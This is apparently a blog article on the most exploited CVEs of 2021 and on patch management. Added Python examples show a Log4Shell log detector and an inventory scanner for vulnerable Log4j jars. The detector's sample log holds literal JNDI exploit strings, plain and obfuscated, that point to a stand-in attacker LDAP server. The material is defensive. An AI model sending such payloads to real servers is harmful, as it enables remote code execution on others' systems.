One of the most frustrating things about cybersecurity is that most of the vulnerabilities exploited by cybercriminals are well documented. A joint alert shared by the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal Bureau of Investigation (FBI), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NZ NCSC), and United Kingdom’s National Cyber Security Centre (NCSC-UK) even goes so far as to identify the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited in 2021. They include:
CVE-2021-44228. This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open-source logging framework. An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system that causes that system to execute arbitrary code. The request allows a cyber actor to take full control over the system.
CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065. These vulnerabilities, known collectively as ProxyLogon, affect Microsoft Exchange email servers. Exploiting them in combination (a technique known as vulnerability chaining) allows an unauthenticated attacker to execute arbitrary code and thereby gain persistent access to files and mailboxes on the servers, as well as to credentials stored on them.
CVE-2021-34523, CVE-2021-34473, CVE-2021-31207. These vulnerabilities, known as ProxyShell, also affect Microsoft Exchange email servers. Exploiting them in combination likewise enables an attacker to execute arbitrary code. The vulnerabilities reside in the Microsoft Client Access Service (CAS), which typically runs on port 443 on the Microsoft Internet Information Services (IIS) platform.
CVE-2021-26084. This vulnerability affects Atlassian Confluence Server and Data Center platforms. It too allows an unauthenticated actor to execute arbitrary code.
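As an added illustration of the "specially crafted request" that triggers Log4Shell (example code written for this edit, not code from the article or the joint alert), the following Python checks web-server access logs for the `${jndi:` lookup that Log4j resolves, including the URL-encoded and nested-lookup obfuscations seen in the wild. The log lines are constructed for the example, and 203.0.113.9 is a documentation address standing in for an attacker-controlled LDAP server.

```python
"""Flag Log4Shell (CVE-2021-44228) exploitation attempts in access logs.

Added example, not from the article. Log4j evaluates lookups such as
${jndi:ldap://attacker/x} in any string it logs (User-Agent, URI, headers).
Attackers hide the trigger behind URL encoding and nested lookups such as
${lower:j} or ${::-j}, so the detector decodes and folds those before matching.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log style (not real traffic).
SAMPLE_LOG = r'''203.0.113.7 - - [10/Dec/2021:22:01:13 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.7 - - [10/Dec/2021:22:01:14 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://203.0.113.9:1389/a}"
203.0.113.7 - - [10/Dec/2021:22:01:15 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.9%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"
203.0.113.7 - - [10/Dec/2021:22:01:16 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9/a}"
198.51.100.4 - - [10/Dec/2021:22:01:17 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Dec/2021:22:01:18 +0000] "GET /docs/${version} HTTP/1.1" 404 0 "-" "Mozilla/5.0"
'''

# ${lower:x} / ${upper:x} resolve to x (case is irrelevant for matching).
FOLD_CASE = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.I)
# ${anything:-x} resolves to the default value x when the lookup is undefined.
FOLD_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The lookup that reaches JndiLookup; scheme (ldap, rmi, dns, ...) comes after.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(line: str) -> str:
    """Undo URL encoding and collapse nested lookups until nothing changes."""
    for _ in range(3):  # a few layers of double encoding is plenty
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    prev = None
    while prev != line:  # innermost lookups have no $,{,} inside, so they fold first
        prev = line
        line = FOLD_CASE.sub(r"\1", line)
        line = FOLD_DEFAULT.sub(r"\1", line)
    return line


def is_log4shell_probe(line: str) -> bool:
    return JNDI.search(normalize(line)) is not None


def scan_log(text: str) -> List[Tuple[int, str, str]]:
    """Return (line number, client IP, normalized line) for each suspicious line."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if is_log4shell_probe(line):
            hits.append((lineno, line.split(" ", 1)[0], normalize(line)))
    return hits


if __name__ == "__main__":
    for lineno, ip, norm in scan_log(SAMPLE_LOG):
        print(f"line {lineno} from {ip}: {norm}")
```

This is a triage aid, not a fix: it only sees fields the web server logged, a request can reach Log4j through any header or parameter the application logs, and there are more obfuscation tricks than the two folded here. The sixth sample line (`${version}`) is deliberately not flagged, since plain lookups are legitimate and only `jndi:` reaches the network. The authoritative remedy remains patching log4j-core or removing JndiLookup.class.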
The alert notes that three of the top 15 routinely exploited vulnerabilities of 2021 were also routinely exploited in 2020. Obviously, a lot of organizations are still failing to patch software in a timely manner. A recent report published by BeyondTrust, a provider of a patch management platform, notes that a third of breaches are the result of a known vulnerability that was not patched.
The challenge is that successful patch management requires a lot of time and effort. IT teams need to continuously track when patches are available, find someone to install each patch, test it, document that it was applied and then generate a report. It’s not uncommon for a patch to break one or more applications, given all the dependencies that exist between the software components that make up an IT environment. When a vulnerability is disclosed, it can take months to find every instance, particularly for a library like Log4j that is bundled inside other applications rather than installed on its own. Many IT teams are still working toward patching all their instances of Log4j, the open-source logging library for Java applications, four months after the Log4Shell zero-day was disclosed.
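For the "find all the instances" problem described above, here is an added example (written for this edit, not code from the article) of the kind of inventory script teams wrote for Log4Shell: it walks a filesystem, opens Java archives, reports every bundled log4j-core with its version and whether JndiLookup.class is still present, and recurses into jars nested inside wars and ears. The directory layout, archive names and archive contents are constructed for the example; the class files are placeholder bytes.

```python
"""Inventory Log4j archives on a host, including jars nested inside wars/ears.

Added example, not from the article. Walks a tree, opens every .jar/.war/.ear/.zip,
records any archive that bundles log4j-core (via its Maven pom.properties) or
contains JndiLookup.class (the class Log4Shell abuses), and recurses into
archives found inside archives. A sample tree is constructed so it runs offline.
"""
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J_CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXTS = (".jar", ".war", ".ear", ".zip")


def parse_version(pom_properties: bytes) -> Optional[str]:
    for line in pom_properties.decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def is_vulnerable_version(version: Optional[str]) -> bool:
    """CVE-2021-44228 affects log4j-core 2.x before 2.15.0, except the backport
    releases 2.12.2 (Java 7) and 2.3.1 (Java 6). Unparseable or unknown
    versions are treated as vulnerable so a human looks at them."""
    if version is None:
        return True
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        return True
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    if major != 2:
        return False  # 1.x is not affected by CVE-2021-44228
    if minor == 12:
        return patch < 2
    if minor == 3:
        return patch < 1
    return minor < 15


def scan_archive(data: bytes, path: str, findings: List[Dict]) -> None:
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # not really a ZIP despite the extension
    with zf:
        names = set(zf.namelist())
        version = parse_version(zf.read(LOG4J_CORE_POM)) if LOG4J_CORE_POM in names else None
        has_jndi = JNDI_CLASS in names
        if version is not None or has_jndi:
            findings.append({
                "path": path, "version": version, "jndi_lookup": has_jndi,
                # Deleting JndiLookup.class was the stop-gap mitigation, so an old
                # version without the class is reported but not flagged.
                "vulnerable": has_jndi and is_vulnerable_version(version),
            })
        for name in names:  # jars inside wars/ears are where instances hide
            if name.lower().endswith(ARCHIVE_EXTS):
                scan_archive(zf.read(name), f"{path}!{name}", findings)


def scan_tree(root: str) -> List[Dict]:
    findings: List[Dict] = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower().endswith(ARCHIVE_EXTS):
                full = os.path.join(dirpath, fname)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, findings)
    return findings


def build_archive(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_tree(root: str) -> None:
    """Constructed stand-in for a deployment (class entries are placeholder bytes)."""
    klass = b"\xca\xfe\xba\xbe"
    old = build_archive({LOG4J_CORE_POM: b"version=2.14.1\n", JNDI_CLASS: klass})
    fixed = build_archive({LOG4J_CORE_POM: b"version=2.17.1\n", JNDI_CLASS: klass})
    stripped = build_archive({LOG4J_CORE_POM: b"version=2.14.1\n"})  # class removed
    unrelated = build_archive({"com/example/App.class": klass})
    war = build_archive({"WEB-INF/web.xml": b"<web-app/>", "WEB-INF/lib/log4j-core-2.14.1.jar": old})
    lib = os.path.join(root, "opt", "app", "lib")
    os.makedirs(lib)
    for name, data in {"log4j-core-2.14.1.jar": old, "log4j-core-2.17.1.jar": fixed,
                       "log4j-core-stripped.jar": stripped, "util.jar": unrelated}.items():
        with open(os.path.join(lib, name), "wb") as fh:
            fh.write(data)
    with open(os.path.join(root, "opt", "app", "portal.war"), "wb") as fh:
        fh.write(war)


def demo() -> List[Dict]:
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_sample_tree(root)
    return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        flag = "VULNERABLE" if f["vulnerable"] else "ok"
        print(f"{flag:10} version={f['version']} jndi_lookup={f['jndi_lookup']} {f['path']}")
```

Run against a real host, point `scan_tree` at `/` (or the application roots) instead of the sample tree. The version check is deliberately conservative: anything it cannot parse is reported as vulnerable, and a stripped JndiLookup.class is recorded even when it is not flagged, because the later Log4j CVEs fixed in 2.16 and 2.17 still warrant upgrading rather than relying on the class deletion.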
The only thing more tedious than patching applications, of course, is cleaning up after a breach has been detected. The only real difference is the level of scrutiny that inevitably accompanies a breach. They say an ounce of prevention is always worth a pound of cure. That’s never been truer than when it comes to IT environments where simple inertia all too often winds up being the worst enemy of all.
Mike Vizard has covered IT for more than 25 years and has edited or contributed to a number of tech publications including InfoWorld, eWeek, CRN, Baseline, ComputerWorld, TMCNet, and Digital Review. He currently blogs for IT Business Edge and contributes to CIOinsight, The Channel Insider, Programmableweb, and Slashdot. Mike also blogs about emerging cloud technology for SmarterMSP.